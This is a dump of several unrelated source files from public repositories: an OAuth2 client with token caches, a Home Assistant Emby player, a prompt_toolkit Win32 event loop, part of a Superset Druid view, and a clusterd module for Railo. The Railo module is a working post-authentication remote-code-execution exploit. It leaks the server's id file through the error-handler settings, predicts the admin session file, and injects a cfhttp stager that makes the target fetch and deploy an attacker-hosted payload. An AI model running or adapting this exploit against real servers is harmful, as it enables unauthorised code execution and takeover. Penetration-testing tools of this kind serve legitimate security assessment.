"""Interface for OAuth2 token caches."""
def PutToken(self, key, value):
raise NotImplementedError
def GetToken(self, key):
raise NotImplementedError
class NoopTokenCache(TokenCache):
"""A stub implementation of TokenCache that does nothing."""
def PutToken(self, key, value):
pass
def GetToken(self, key):
return None
class InMemoryTokenCache(TokenCache):
"""An in-memory token cache.
The cache is implemented by a python dict, and inherits the thread-safety
properties of dict.
"""
def __init__(self):
super(InMemoryTokenCache, self).__init__()
self.cache = dict()
def PutToken(self, key, value):
LOG.info('InMemoryTokenCache.PutToken: key=%s', key)
self.cache[key] = value
def GetToken(self, key):
value = self.cache.get(key, None)
LOG.info('InMemoryTokenCache.GetToken: key=%s%s present',
key, ' not' if value is None else '')
return value
class FileSystemTokenCache(TokenCache):
"""An implementation of a token cache that persists tokens on disk.
Each token object in the cache is stored in serialized form in a separate
file. The cache file's name can be configured via a path pattern that is
parameterized by the key under which a value is cached and optionally the
current processes uid as obtained by os.getuid().
Since file names are generally publicly visible in the system, it is important
that the cache key does not leak information about the token's value. If
client code computes cache keys from token values, a cryptographically strong
one-way function must be used.
"""
def __init__(self, path_pattern=None):
"""Creates a FileSystemTokenCache.
Args:
path_pattern: Optional string argument to specify the path pattern for
cache files. The argument should be a path with format placeholders
'%(key)s' and optionally '%(uid)s'. If the argument is omitted, the
default pattern
<tmpdir>/oauth2_client-tokencache.%(uid)s.%(key)s
is used, where <tmpdir> is replaced with the system temp dir as
obtained from tempfile.gettempdir().
"""
super(FileSystemTokenCache, self).__init__()
self.path_pattern = path_pattern
if not path_pattern:
self.path_pattern = os.path.join(
tempfile.gettempdir(), 'oauth2_client-tokencache.%(uid)s.%(key)s')
def CacheFileName(self, key):
uid = '_'
try:
# os.getuid() doesn't seem to work in Windows
uid = str(os.getuid())
except:
pass
return self.path_pattern % {'key': key, 'uid': uid}
def PutToken(self, key, value):
"""Serializes the value to the key's filename.
To ensure that written tokens aren't leaked to different users, we
a) unlink an existing cache file, if any (to ensure we don't fall victim
to symlink attacks and the like),
b) create a new file with O_CREAT | O_EXCL (to ensure nobody is trying to
race us)
If either of these steps fail, we simply give up (but log a warning). Not
caching access tokens is not catastrophic, and failure to create a file
can happen for either of the following reasons:
- someone is attacking us as above, in which case we want to default to
safe operation (not write the token);
- another legitimate process is racing us; in this case one of the two
will win and write the access token, which is fine;
- we don't have permission to remove the old file or write to the
specified directory, in which case we can't recover
Args:
key: the refresh_token hash key to store.
value: the access_token value to serialize.
"""
cache_file = self.CacheFileName(key)
LOG.info('FileSystemTokenCache.PutToken: key=%s, cache_file=%s',
key, cache_file)
try:
os.unlink(cache_file)
except:
# Ignore failure to unlink the file; if the file exists and can't be
# unlinked, the subsequent open with O_CREAT | O_EXCL will fail.
pass
flags = os.O_RDWR | os.O_CREAT | os.O_EXCL
# Accommodate Windows; stolen from python2.6/tempfile.py.
if hasattr(os, 'O_NOINHERIT'):
flags |= os.O_NOINHERIT
if hasattr(os, 'O_BINARY'):
flags |= os.O_BINARY
try:
fd = os.open(cache_file, flags, 0600)
except (OSError, IOError), e:
LOG.warning('FileSystemTokenCache.PutToken: '
'Failed to create cache file %s: %s', cache_file, e)
return
f = os.fdopen(fd, 'w+b')
f.write(value.Serialize())
f.close()
def GetToken(self, key):
"""Returns a deserialized access token from the key's filename."""
value = None
cache_file = self.CacheFileName(key)
try:
f = open(cache_file)
value = AccessToken.UnSerialize(f.read())
f.close()
except (IOError, OSError), e:
if e.errno != errno.ENOENT:
LOG.warning('FileSystemTokenCache.GetToken: '
'Failed to read cache file %s: %s', cache_file, e)
except Exception, e:
LOG.warning('FileSystemTokenCache.GetToken: '
'Failed to read cache file %s (possibly corrupted): %s',
cache_file, e)
LOG.info('FileSystemTokenCache.GetToken: key=%s%s present (cache_file=%s)',
key, ' not' if value is None else '', cache_file)
return value
class OAuth2Provider(object):
"""Encapsulates information about an OAuth2 provider."""
def __init__(self, label, authorization_uri, token_uri):
"""Creates an OAuth2Provider.
Args:
label: A string identifying this oauth2 provider, e.g. "Google".
authorization_uri: The provider's authorization URI.
token_uri: The provider's token endpoint URI.
"""
self.label = label
self.authorization_uri = authorization_uri
self.token_uri = token_uri
class OAuth2Client(object):
"""An OAuth2 client."""
def __init__(self, provider, client_id, client_secret,
url_opener=None,
proxy=None,
access_token_cache=None,
datetime_strategy=datetime.datetime):
"""Creates an OAuth2Client.
Args:
provider: The OAuth2Provider provider this client will authenticate
against.
client_id: The OAuth2 client ID of this client.
client_secret: The OAuth2 client secret of this client.
url_opener: An optional urllib2.OpenerDirector to use for making HTTP
requests to the OAuth2 provider's token endpoint. The provided
url_opener *must* be configured to validate server SSL certificates
for requests to https connections, and to correctly handle proxying of
https requests. If this argument is omitted or None, a suitable
opener based on fancy_urllib is used.
proxy: An optional string specifying a HTTP proxy to be used, in the form
'<proxy>:<port>'. This option is only effective if the url_opener has
been configured with a fancy_urllib.FancyProxyHandler (this is the
case for the default url_opener).
access_token_cache: An optional instance of a TokenCache. If omitted or
None, an InMemoryTokenCache is used.
datetime_strategy: datetime module strategy to use.
"""
self.provider = provider
self.client_id = client_id
self.client_secret = client_secret
# datetime_strategy is used to invoke utcnow() on; it is injected into the
# constructor for unit testing purposes.
self.datetime_strategy = datetime_strategy
self._proxy = proxy
self.access_token_cache = access_token_cache or InMemoryTokenCache()
self.ca_certs_file = os.path.join(
os.path.dirname(os.path.abspath(cacerts.__file__)), 'cacerts.txt')
if url_opener is None:
# TODO(Google): set user agent?
url_opener = urllib2.build_opener(
fancy_urllib.FancyProxyHandler(),
fancy_urllib.FancyRedirectHandler(),
fancy_urllib.FancyHTTPSHandler())
self.url_opener = url_opener
def _TokenRequest(self, request):
"""Make a requst to this client's provider's token endpoint.
Args:
request: A dict with the request parameteres.
Returns:
A tuple (response, error) where,
- response is the parsed JSON response received from the token endpoint,
or None if no parseable response was received, and
- error is None if the request succeeded or
an Exception if an error occurred.
"""
body = urllib.urlencode(request)
LOG.debug('_TokenRequest request: %s', body)
response = None
try:
request = fancy_urllib.FancyRequest(
self.provider.token_uri, data=body)
if self._proxy:
request.set_proxy(self._proxy, 'http')
request.set_ssl_info(ca_certs=self.ca_certs_file)
result = self.url_opener.open(request)
resp_body = result.read()
LOG.debug('_TokenRequest response: %s', resp_body)
except urllib2.HTTPError, e:
try:
response = json.loads(e.read())
except:
pass
return (response, e)
try:
response = json.loads(resp_body)
except ValueError, e:
return (None, e)
return (response, None)
def GetAccessToken(self, refresh_token):
"""Given a RefreshToken, obtains a corresponding access token.
First, this client's access token cache is checked for an existing,
not-yet-expired access token for the provided refresh token. If none is
found, the client obtains a fresh access token for the provided refresh
token from the OAuth2 provider's token endpoint.
Args:
refresh_token: The RefreshToken object which to get an access token for.
Returns:
The cached or freshly obtained AccessToken.
Raises:
AccessTokenRefreshError if an error occurs.
"""
# Ensure only one thread at a time attempts to get (and possibly refresh)
# the access token. This doesn't prevent concurrent refresh attempts across
# multiple gsutil instances, but at least protects against multiple threads
# simultaneously attempting to refresh when gsutil -m is used.
token_exchange_lock.acquire()
try:
cache_key = refresh_token.CacheKey()
LOG.info('GetAccessToken: checking cache for key %s', cache_key)
access_token = self.access_token_cache.GetToken(cache_key)
LOG.debug('GetAccessToken: token from cache: %s', access_token)
if access_token is None or access_token.ShouldRefresh():
LOG.info('GetAccessToken: fetching fresh access token...')
access_token = self.FetchAccessToken(refresh_token)
LOG.debug('GetAccessToken: fresh access token: %s', access_token)
self.access_token_cache.PutToken(cache_key, access_token)
return access_token
finally:
token_exchange_lock.release()
def FetchAccessToken(self, refresh_token):
"""Fetches an access token from the provider's token endpoint.
Given a RefreshToken, fetches an access token from this client's OAuth2
provider's token endpoint.
Args:
refresh_token: The RefreshToken object which to get an access token for.
Returns:
The fetched AccessToken.
Raises:
AccessTokenRefreshError: if an error occurs.
"""
request = {
'grant_type': 'refresh_token',
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': refresh_token.refresh_token,
}
LOG.debug('FetchAccessToken request: %s', request)
response, error = self._TokenRequest(request)
LOG.debug(
'FetchAccessToken response (error = %s): %s', error, response)
if error:
oauth2_error = ''
if response and response['error']:
oauth2_error = '; OAuth2 error: %s' % response['error']
raise AccessTokenRefreshError(
'Failed to exchange refresh token into access token; '
'request failed: %s%s' % (error, oauth2_error))
if 'access_token' not in response:
raise AccessTokenRefreshError(
'Failed to exchange refresh token into access token; response: %s' %
response)
token_expiry = None
if 'expires_in' in response:
token_expiry = (
self.datetime_strategy.utcnow() +
datetime.timedelta(seconds=int(response['expires_in'])))
return AccessToken(response['access_token'], token_expiry,
datetime_strategy=self.datetime_strategy)
def GetAuthorizationUri(self, redirect_uri, scopes, extra_params=None):
"""Gets the OAuth2 authorization URI and the specified scope(s).
Applications should navigate/redirect the user's user agent to this URI. The
user will be shown an approval UI requesting the user to approve access of
this client to the requested scopes under the identity of the authenticated
end user.
The application should expect the user agent to be redirected to the
specified redirect_uri after the user's approval/disapproval.
Installed applications may use the special redirect_uri
'urn:ietf:wg:oauth:2.0:oob' to indicate that instead of redirecting the
browser, the user be shown a confirmation page with a verification code.
The application should query the user for this code.
Args:
redirect_uri: Either the string 'urn:ietf:wg:oauth:2.0:oob' for a
non-web-based application, or a URI that handles the callback from the
authorization server.
scopes: A list of strings specifying the OAuth scopes the application
requests access to.
extra_params: Optional dictionary of additional parameters to be passed to
the OAuth2 authorization URI.
Returns:
The authorization URI for the specified scopes as a string.
"""
request = {
'response_type': 'code',
'client_id': self.client_id,
'redirect_uri': redirect_uri,
'scope': ' '.join(scopes),
}
if extra_params:
request.update(extra_params)
url_parts = list(urlparse.urlparse(self.provider.authorization_uri))
# 4 is the index of the query part
request.update(dict(cgi.parse_qsl(url_parts[4])))
url_parts[4] = urllib.urlencode(request)
return urlparse.urlunparse(url_parts)
def ExchangeAuthorizationCode(self, code, redirect_uri, scopes):
"""Exchanges an authorization code for a refresh token.
Invokes this client's OAuth2 provider's token endpoint to exchange an
authorization code into a refresh token.
Args:
code: the authorization code.
redirect_uri: Either the string 'urn:ietf:wg:oauth:2.0:oob' for a
non-web-based application, or a URI that handles the callback from the
authorization server.
scopes: A list of strings specifying the OAuth scopes the application
requests access to.
Returns:
A tuple consisting of the resulting RefreshToken and AccessToken.
Raises:
AuthorizationCodeExchangeError: if an error occurs.
"""
request = {
'grant_type': 'authorization_code',
'client_id': self.client_id,
'client_secret': self.client_secret,
'code': code,
'redirect_uri': redirect_uri,
'scope': ' '.join(scopes),
}
LOG.debug('ExchangeAuthorizationCode request: %s', request)
response, error = self._TokenRequest(request)
LOG.debug(
'ExchangeAuthorizationCode response (error = %s): %s',
error, response)
if error:
oauth2_error = ''
if response and response['error']:
oauth2_error = '; OAuth2 error: %s' % response['error']
raise AuthorizationCodeExchangeError(
'Failed to exchange authorization code into access token; '
'request failed: %s%s' % (str(error), oauth2_error))
if 'access_token' not in response:
raise AuthorizationCodeExchangeError(
'Failed to exchange authorization code into access token; '
'response: %s' % response)
token_expiry = None
if 'expires_in' in response:
token_expiry = (
self.datetime_strategy.utcnow() +
datetime.timedelta(seconds=int(response['expires_in'])))
access_token = AccessToken(response['access_token'], token_expiry,
datetime_strategy=self.datetime_strategy)
refresh_token = None
refresh_token_string = response.get('refresh_token', None)
token_exchange_lock.acquire()
try:
if refresh_token_string:
refresh_token = RefreshToken(self, refresh_token_string)
self.access_token_cache.PutToken(refresh_token.CacheKey(), access_token)
finally:
token_exchange_lock.release()
return (refresh_token, access_token)
class AccessToken(object):
"""Encapsulates an OAuth2 access token."""
def __init__(self, token, expiry, datetime_strategy=datetime.datetime):
self.token = token
self.expiry = expiry
self.datetime_strategy = datetime_strategy
@staticmethod
def UnSerialize(query):
"""Creates an AccessToken object from its serialized form."""
def GetValue(d, key):
return (d.get(key, [None]))[0]
kv = cgi.parse_qs(query)
if not kv['token']:
return None
expiry = None
expiry_tuple = GetValue(kv, 'expiry')
if expiry_tuple:
try:
expiry = datetime.datetime(
*[int(n) for n in expiry_tuple.split(',')])
except:
return None
return AccessToken(GetValue(kv, 'token'), expiry)
def Serialize(self):
"""Serializes this object as URI-encoded key-value pairs."""
# There's got to be a better way to serialize a datetime. Unfortunately,
# there is no reliable way to convert into a unix epoch.
kv = {'token': self.token}
if self.expiry:
t = self.expiry
tupl = (t.year, t.month, t.day, t.hour, t.minute, t.second, t.microsecond)
kv['expiry'] = ','.join([str(i) for i in tupl])
return urllib.urlencode(kv)
def ShouldRefresh(self, time_delta=300):
"""Whether the access token needs to be refreshed.
Args:
time_delta: refresh access token when it expires within time_delta secs.
Returns:
True if the token is expired or about to expire, False if the
token should be expected to work. Note that the token may still
be rejected, e.g. if it has been revoked server-side.
"""
if self.expiry is None:
return False
return (self.datetime_strategy.utcnow()
+ datetime.timedelta(seconds=time_delta) > self.expiry)
def __eq__(self, other):
return self.token == other.token and self.expiry == other.expiry
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return 'AccessToken(token=%s, expiry=%sZ)' % (self.token, self.expiry)
class RefreshToken(object):
"""Encapsulates an OAuth2 refresh token."""
def __init__(self, oauth2_client, refresh_token):
self.oauth2_client = oauth2_client
self.refresh_token = refresh_token
def CacheKey(self):
"""Computes a cache key for this refresh token.
The cache key is computed as the SHA1 hash of the token, and as such
satisfies the FileSystemTokenCache requirement that cache keys do not leak
information about token values.
Returns:
A hash key for this refresh token.
"""
h = sha1()
h.update(self.refresh_token)
return h.hexdigest()
def GetAuthorizationHeader(self):
"""Gets the access token HTTP authorication header value.
Returns:
The value of an Authorization HTTP header that authenticates
requests with an OAuth2 access token based on this refresh token.
"""
return 'Bearer %s' % self.oauth2_client.GetAccessToken(self).token
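# Added usage sketch (not part of the original library): a hypothetical flow
# wiring the classes above together. The provider URIs, client ID/secret and
# authorization code below are placeholders, not real endpoints.
#
#   provider = OAuth2Provider(
#       'Example', 'https://provider.example/auth', 'https://provider.example/token')
#   client = OAuth2Client(provider, 'my-client-id', 'my-client-secret',
#                         access_token_cache=FileSystemTokenCache())
#   refresh_token, access_token = client.ExchangeAuthorizationCode(
#       code, 'urn:ietf:wg:oauth:2.0:oob', ['scope-a'])
#   auth_header = refresh_token.GetAuthorizationHeader()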
|
bsd-3-clause
|
ewandor/home-assistant
|
homeassistant/components/media_player/emby.py
|
4
|
11094
|
"""
Support to interface with the Emby API.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.emby/
"""
import asyncio
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_TVSHOW, MEDIA_TYPE_VIDEO, MEDIA_TYPE_MUSIC, SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE, SUPPORT_SEEK, SUPPORT_STOP, SUPPORT_PREVIOUS_TRACK,
MediaPlayerDevice, SUPPORT_PLAY, PLATFORM_SCHEMA)
from homeassistant.const import (
STATE_IDLE, STATE_OFF, STATE_PAUSED, STATE_PLAYING,
CONF_HOST, CONF_PORT, CONF_SSL, CONF_API_KEY, DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyemby==1.4']
_LOGGER = logging.getLogger(__name__)
CONF_AUTO_HIDE = 'auto_hide'
MEDIA_TYPE_TRAILER = 'trailer'
MEDIA_TYPE_GENERIC_VIDEO = 'video'
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = 8096
DEFAULT_SSL_PORT = 8920
DEFAULT_SSL = False
DEFAULT_AUTO_HIDE = False
_LOGGER = logging.getLogger(__name__)
SUPPORT_EMBY = SUPPORT_PAUSE | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_STOP | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_PORT, default=None): cv.port,
vol.Optional(CONF_AUTO_HIDE, default=DEFAULT_AUTO_HIDE): cv.boolean,
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the Emby platform."""
from pyemby import EmbyServer
host = config.get(CONF_HOST)
key = config.get(CONF_API_KEY)
port = config.get(CONF_PORT)
ssl = config.get(CONF_SSL)
auto_hide = config.get(CONF_AUTO_HIDE)
if port is None:
port = DEFAULT_SSL_PORT if ssl else DEFAULT_PORT
_LOGGER.debug("Setting up Emby server at: %s:%s", host, port)
emby = EmbyServer(host, key, port, ssl, hass.loop)
active_emby_devices = {}
inactive_emby_devices = {}
@callback
def device_update_callback(data):
"""Handle devices which are added to Emby."""
new_devices = []
active_devices = []
for dev_id in emby.devices:
active_devices.append(dev_id)
if dev_id not in active_emby_devices and \
dev_id not in inactive_emby_devices:
new = EmbyDevice(emby, dev_id)
active_emby_devices[dev_id] = new
new_devices.append(new)
elif dev_id in inactive_emby_devices:
if emby.devices[dev_id].state != 'Off':
add = inactive_emby_devices.pop(dev_id)
active_emby_devices[dev_id] = add
_LOGGER.debug("Showing %s, item: %s", dev_id, add)
add.set_available(True)
add.set_hidden(False)
if new_devices:
_LOGGER.debug("Adding new devices: %s", new_devices)
async_add_devices(new_devices, update_before_add=True)
@callback
def device_removal_callback(data):
"""Handle the removal of devices from Emby."""
if data in active_emby_devices:
rem = active_emby_devices.pop(data)
inactive_emby_devices[data] = rem
_LOGGER.debug("Inactive %s, item: %s", data, rem)
rem.set_available(False)
if auto_hide:
rem.set_hidden(True)
@callback
def start_emby(event):
"""Start Emby connection."""
emby.start()
@asyncio.coroutine
def stop_emby(event):
"""Stop Emby connection."""
yield from emby.stop()
emby.add_new_devices_callback(device_update_callback)
emby.add_stale_devices_callback(device_removal_callback)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_emby)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_emby)
class EmbyDevice(MediaPlayerDevice):
"""Representation of an Emby device."""
def __init__(self, emby, device_id):
"""Initialize the Emby device."""
_LOGGER.debug("New Emby Device initialized with ID: %s", device_id)
self.emby = emby
self.device_id = device_id
self.device = self.emby.devices[self.device_id]
self._hidden = False
self._available = True
self.media_status_last_position = None
self.media_status_received = None
@asyncio.coroutine
def async_added_to_hass(self):
"""Register callback."""
self.emby.add_update_callback(
self.async_update_callback, self.device_id)
@callback
def async_update_callback(self, msg):
"""Handle device updates."""
# Check if we should update progress
if self.device.media_position:
if self.device.media_position != self.media_status_last_position:
self.media_status_last_position = self.device.media_position
self.media_status_received = dt_util.utcnow()
elif not self.device.is_nowplaying:
# No position reported and nothing is playing, so drop the stale values
self.media_status_last_position = None
self.media_status_received = None
self.async_schedule_update_ha_state()
@property
def hidden(self):
"""Return True if entity should be hidden from UI."""
return self._hidden
def set_hidden(self, value):
"""Set hidden property."""
self._hidden = value
@property
def available(self):
"""Return True if entity is available."""
return self._available
def set_available(self, value):
"""Set available property."""
self._available = value
@property
def unique_id(self):
"""Return the id of this emby client."""
return '{}.{}'.format(self.__class__, self.device_id)
@property
def supports_remote_control(self):
"""Return control ability."""
return self.device.supports_remote_control
@property
def name(self):
"""Return the name of the device."""
return 'Emby - {} - {}'.format(self.device.client, self.device.name) \
or DEVICE_DEFAULT_NAME
@property
def should_poll(self):
"""Return True if entity has to be polled for state."""
return False
@property
def state(self):
"""Return the state of the device."""
state = self.device.state
if state == 'Paused':
return STATE_PAUSED
elif state == 'Playing':
return STATE_PLAYING
elif state == 'Idle':
return STATE_IDLE
elif state == 'Off':
return STATE_OFF
@property
def app_name(self):
"""Return current user as app_name."""
# Ideally the media_player object would have a user property.
return self.device.username
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.device.media_id
@property
def media_content_type(self):
"""Content type of current playing media."""
media_type = self.device.media_type
if media_type == 'Episode':
return MEDIA_TYPE_TVSHOW
elif media_type == 'Movie':
return MEDIA_TYPE_VIDEO
elif media_type == 'Trailer':
return MEDIA_TYPE_TRAILER
elif media_type == 'Music':
return MEDIA_TYPE_MUSIC
elif media_type == 'Video':
return MEDIA_TYPE_GENERIC_VIDEO
elif media_type == 'Audio':
return MEDIA_TYPE_MUSIC
return None
@property
def media_duration(self):
"""Return the duration of current playing media in seconds."""
return self.device.media_runtime
@property
def media_position(self):
"""Return the position of current playing media in seconds."""
return self.media_status_last_position
@property
def media_position_updated_at(self):
"""
When was the position of the current playing media valid.
Returns value from homeassistant.util.dt.utcnow().
"""
return self.media_status_received
@property
def media_image_url(self):
"""Return the image URL of current playing media."""
return self.device.media_image_url
@property
def media_title(self):
"""Return the title of current playing media."""
return self.device.media_title
@property
def media_season(self):
"""Season of curent playing media (TV Show only)."""
return self.device.media_season
@property
def media_series_title(self):
"""Return the title of the series of current playing media (TV)."""
return self.device.media_series_title
@property
def media_episode(self):
"""Return the episode of current playing media (TV only)."""
return self.device.media_episode
@property
def media_album_name(self):
"""Return the album name of current playing media (Music only)."""
return self.device.media_album_name
@property
def media_artist(self):
"""Return the artist of current playing media (Music track only)."""
return self.device.media_artist
@property
def media_album_artist(self):
"""Return the album artist of current playing media (Music only)."""
return self.device.media_album_artist
@property
def supported_features(self):
"""Flag media player features that are supported."""
if self.supports_remote_control:
return SUPPORT_EMBY
return None
def async_media_play(self):
"""Play media.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_play()
def async_media_pause(self):
"""Pause the media player.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_pause()
def async_media_stop(self):
"""Stop the media player.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_stop()
def async_media_next_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_next()
def async_media_previous_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_previous()
def async_media_seek(self, position):
"""Send seek command.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_seek(position)
|
apache-2.0
|
vicky2135/lucious
|
oscar/lib/python2.7/site-packages/prompt_toolkit/eventloop/asyncio_win32.py
|
23
|
2427
|
"""
Win32 asyncio event loop.
Windows notes:
- Somehow it doesn't seem to work with the 'ProactorEventLoop'.
"""
from __future__ import unicode_literals
from .base import EventLoop, INPUT_TIMEOUT
from ..terminal.win32_input import ConsoleInputReader
from .callbacks import EventLoopCallbacks
from .asyncio_base import AsyncioTimeout
import asyncio
__all__ = (
'Win32AsyncioEventLoop',
)
class Win32AsyncioEventLoop(EventLoop):
def __init__(self, loop=None):
self._console_input_reader = ConsoleInputReader()
self.running = False
self.closed = False
self.loop = loop or asyncio.get_event_loop()
@asyncio.coroutine
def run_as_coroutine(self, stdin, callbacks):
"""
The input 'event loop'.
"""
# Note: We cannot use "yield from", because this package also
# installs on Python 2.
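# Instead the executor future is stepped by hand below: iterating it with
# next() yields each intermediate step, and the final key list arrives via
# StopIteration.args[0], which is what "yield from" would have returned.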
assert isinstance(callbacks, EventLoopCallbacks)
if self.closed:
raise Exception('Event loop already closed.')
timeout = AsyncioTimeout(INPUT_TIMEOUT, callbacks.input_timeout, self.loop)
self.running = True
try:
while self.running:
timeout.reset()
# Get keys
try:
g = iter(self.loop.run_in_executor(None, self._console_input_reader.read))
while True:
yield next(g)
except StopIteration as e:
keys = e.args[0]
# Feed keys to input processor.
for k in keys:
callbacks.feed_key(k)
finally:
timeout.stop()
def stop(self):
self.running = False
def close(self):
# Note: we should not close the asyncio loop itself, because that one
# was not created here.
self.closed = True
self._console_input_reader.close()
def run_in_executor(self, callback):
self.loop.run_in_executor(None, callback)
def call_from_executor(self, callback, _max_postpone_until=None):
self.loop.call_soon_threadsafe(callback)
def add_reader(self, fd, callback):
" Start watching the file descriptor for read availability. "
self.loop.add_reader(fd, callback)
def remove_reader(self, fd):
" Stop watching the file descriptor for read availability. "
self.loop.remove_reader(fd)
|
bsd-3-clause
|
0x27/clusterd
|
src/platform/railo/deployers/log_injection.py
|
5
|
4821
|
from src.platform.railo.authenticate import checkAuth
from src.platform.railo.interfaces import RINTERFACES
from src.module.deploy_utils import _serve, waitServe, killServe, parse_war_path
from re import findall
from log import LOG
from hashlib import md5
from time import sleep
from os.path import abspath
from threading import Thread
from urllib import quote
from os import system
import state
import utility
title = RINTERFACES.WEB
versions = ['3.3', '4.0', '4.1', '4.2']
def deploy(fingerengine, fingerprint):
""" Exploit a post-auth RCE vulnerability in Railo; uses a simple cfhttp
stager to drop the payload
"""
payload = parse_war_path(fingerengine.options.deploy, True)
payload_path = abspath(fingerengine.options.deploy)
stager = ":<cfhttp method=\"get\" url=\"http://{0}:{1}/{2}\""\
" path=\"{3}\" file=\"{2}\">"
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookie:
utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip,
fingerprint.port),
LOG.ERROR)
return
utility.Msg("Fetching path...")
path = fetchPath(fingerengine, fingerprint)
utility.Msg("Found path %s" % path, LOG.DEBUG)
# configure stager
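# The stager is a cfhttp tag: once Railo evaluates it, the server fetches
# the payload from our local web server ({0}:{1}/{2} above) and writes it
# into its web context directory ({3}).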
stager = quote(stager.format(utility.local_address(), state.external_port,
payload, path + "\context" if fingerengine.options.remote_os \
== 'windows' else '/context'))
utility.Msg("Pulling id file...")
fid = fetchId(base, path, cookie)
if not fid:
return
utility.Msg("Found id %s" % fid, LOG.DEBUG)
# we've got both the security token and the security key, calculate filename
session_file = md5(fid + md5(path).hexdigest()).hexdigest()
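# i.e. the admin session file is named web-<md5(id + md5(path))>.cfm, so the
# id file contents plus the context path are enough to predict it.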
utility.Msg("Session file is web-%s.cfm, attempting to inject stager..." % session_file)
# trigger a new favorite with our web shell
uri = '/railo-context/admin/web.cfm?action=internal.savedata'
uri += '&action2=addfavorite&favorite=%s' % stager
response = utility.requests_get(base + uri, cookies=cookie)
if response.status_code != 200:
utility.Msg("Failed to deploy stager (HTTP %d)" % response.status_code,
LOG.ERROR)
return
utility.Msg("Stager deployed, invoking...", LOG.SUCCESS)
system("cp {0} {1}/{2}".format(payload_path, state.serve_dir, payload))
server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, payload),))
server_thread.start()
sleep(2)
# invoke
data_uri = "/railo-context/admin/userdata/web-%s.cfm" % session_file
_ = utility.requests_get(base + data_uri)
if waitServe(server_thread):
utility.Msg("{0} deployed at /railo-context/{0}".format(payload), LOG.SUCCESS)
killServe()
def fetchPath(fingerengine, fingerprint):
""" We need the path up to WEB-INF\\railo
"""
# attempt to trigger an error and pull the webroot
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/railo-context/admin/asdf.cfm'
response = utility.requests_get(base + uri)
if len(response.content) > 10:
data = findall("Page /admin/asdf.cfm \[(.*?)\]", response.content)
if len(data) > 0:
return data[0].rsplit("\\", 3)[0]
def fetchId(base, path, cookie):
""" Pretty simple two-step process to fetch the id:
a) Set the error handler template to the id file
b) Trigger an error
c) restore handler
"""
# set error handler
set_template = '/railo-context/admin/web.cfm?action=server.error'
data = { 'errType500' : 'Select',
'errorTemplate_Select500' : '/railo-context/templates/error/error.cfm', # default
'errType404' : 'File',
'errorTemplate_File404' : '/railo-context/../id',
'doStatusCode' : 'yes',
'mainAction' : 'update'
}
response = utility.requests_post(base + set_template, data=data, cookies=cookie)
if response.status_code != 200:
utility.Msg("Failed to set error handler (HTTP %d)" % response.status_code, LOG.ERROR)
return None
# trigger 404 and pull file
response = utility.requests_get(base + '/railo-context/admin/xx.cfm')
id = response.content
# got the ID, restore handler
data['errorTemplate_File404'] = '/railo-context/templates/error/error.cfm'
response = utility.requests_post(base + set_template, data=data, cookies=cookie)
return id
|
mit
|
FrederichCheng/incubator-superset
|
superset/connectors/druid/views.py
|
2
|
11262
|
from datetime import datetime
import logging
import sqlalchemy as sqla
from flask import Markup, flash, redirect
from flask_appbuilder import CompactCRUDMixin, expose
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_babel import lazy_gettext as _
from flask_babel import gettext as __
from superset import db, utils, appbuilder, sm, security
from superset.connectors.connector_registry import ConnectorRegistry
from superset.utils import has_access
from superset.connectors.base.views import DatasourceModelView
from superset.views.base import (
BaseSupersetView,
SupersetModelView, validate_json, DeleteMixin, ListWidgetWithCheckboxes,
DatasourceFilter, get_datasource_exist_error_mgs)
from . import models
class DruidColumnInlineView(CompactCRUDMixin, SupersetModelView): # noqa
datamodel = SQLAInterface(models.DruidColumn)
list_title = _('List Druid Column')
show_title = _('Show Druid Column')
add_title = _('Add Druid Column')
edit_title = _('Edit Druid Column')
edit_columns = [
'column_name', 'description', 'dimension_spec_json', 'datasource',
'groupby', 'filterable', 'count_distinct', 'sum', 'min', 'max']
add_columns = edit_columns
list_columns = [
'column_name', 'verbose_name', 'type', 'groupby', 'filterable', 'count_distinct',
'sum', 'min', 'max']
can_delete = False
page_size = 500
label_columns = {
'column_name': _("Column"),
'type': _("Type"),
'datasource': _("Datasource"),
'groupby': _("Groupable"),
'filterable': _("Filterable"),
'count_distinct': _("Count Distinct"),
'sum': _("Sum"),
'min': _("Min"),
'max': _("Max"),
}
description_columns = {
'filterable': _(
"Whether this column is exposed in the `Filters` section "
"of the explore view."),
'dimension_spec_json': utils.markdown(
"this field can be used to specify "
"a `dimensionSpec` as documented [here]"
"(http://druid.io/docs/latest/querying/dimensionspecs.html). "
"Make sure to input valid JSON and that the "
"`outputName` matches the `column_name` defined "
"above.",
True),
}
def post_update(self, col):
col.generate_metrics()
utils.validate_json(col.dimension_spec_json)
def post_add(self, col):
